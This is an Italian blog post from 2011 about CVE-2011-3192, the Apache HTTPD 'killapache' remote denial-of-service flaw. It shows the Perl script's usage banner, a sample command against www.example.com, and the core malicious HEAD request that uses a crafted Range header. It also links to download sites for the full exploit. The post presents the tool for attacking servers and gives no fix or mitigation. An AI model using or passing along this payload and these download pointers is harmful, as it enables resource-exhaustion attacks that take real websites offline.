[DOS]CVE-2011-3192: Apache HTTPD Killer Remote Denial of Service

E apache cade di nuovo in un bel bug…
Il 19 Agosto 2011 è stata una Full disclosure che mostra come poche righe di codice scritte in perl “killapache.pl“ possono causare un Apache HTTPD Web server a remote denial of service (DoS).
Questo attacco permette di prosciugare tutte le risorse del web server e rendere inutilizzabili eventuali siti internet hostati su quel server.
Apache HTTPD 2.0 e 2.2 sono entrambi vulnerabili da questo attacco.

Un programma simile a killapache.pl è il famoso pyloris.

La sintassi di killapache è la seguente:

    print "Apache Remote Denial of Service (memory exhaustion)\n";
    print "by Kingcope\n";
    print "usage: perl killapache.pl  [numforks]\n";
    print "example: perl killapache.pl www.example.com 50\n";

Esempio:
perl killapache.pl www.example.com 50
Il funzionamento:

Funzionamento: DOWNLOAD PDF
$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";

Lo script è scaricabile da qui:

http://www.exploit-db.com/exploits/17696/

http://seclists.org/fulldisclosure/2011/Aug/175

http://pastebin.com/aWwMnKF7

Related posts:

1. PyLoris 3.0: for testing a Denial of Service (DoS) attack
2. Slowloris: Butta giù un server Apache(sito web) con un DOS !
3. [CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction
4. [Metasploit]Sun Java Web Start Plugin Remote Code Excution
5. [CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote code Excution

This entry was posted on Thursday, August 25th, 2011 at 8:03 am and is filed under GNU/Linux, Hacking, Software. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Tagged with: apache • exploit